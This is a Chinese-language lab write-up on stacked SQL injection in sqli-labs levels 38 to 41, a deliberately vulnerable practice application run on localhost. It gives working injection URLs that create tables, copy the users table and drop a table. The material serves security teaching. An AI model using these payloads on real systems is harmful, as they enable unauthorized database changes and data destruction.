标签：Less41 堆叠 38 Less labs sqli 包裹

堆叠注入

Stacked injections:堆叠注入

从名词的含义就可以看到应该是一堆sql语句（多条）一起执行。而在真实的运用中也是这样的，我们知道在mysql中，主要是命令行中，每一条语句结尾加 ; 表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做stacked injection。

堆叠注入简单来说就是我们执行一个句子，在这个句子后面再加一个句子，分号结束。

参考链接： https://www.cnblogs.com/lcamry/p/5762905.html

Less-38

首先测试注入点，发现本关是单引号包裹

 

 

 

 

 

 我们尝试使用堆叠注入，在此之前先打开MySQL命令行，show tables查看原来的命令行

 

 

 使用堆叠注入，新建一个表

http://127.0.0.1/sqli-labs-master/Less-38/?id=1' union select 1,2,3; create table lxk like users;--+

 

 

 打开命令行查看，发现创建成功

删除新建的表

http://127.0.0.1/sqli-labs-master/Less-38/?id=1'; drop table lxk ;--+

 

 

 

 

 

 

Less-39

无包裹

这一关除了包裹方式不一样，其他的均与第38关相同

http://127.0.0.1/sqli-labs-master/Less-39/?id=1;create table lxk39 like users;insert into lxk39 select * from users;--+

 

 

 

 

 

 

 同样的方法可以把它删除

 

 

 

 Less-40

这一关使用（'1'）进行包裹,其他均与第38关相同

 

 Less-41

这一关无包裹，不显示错误，其他均与第38关相同。

 

标签：Less41,堆叠,38,Less,labs,sqli,包裹
来源： https://www.cnblogs.com/heiwa-0924/p/12383634.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。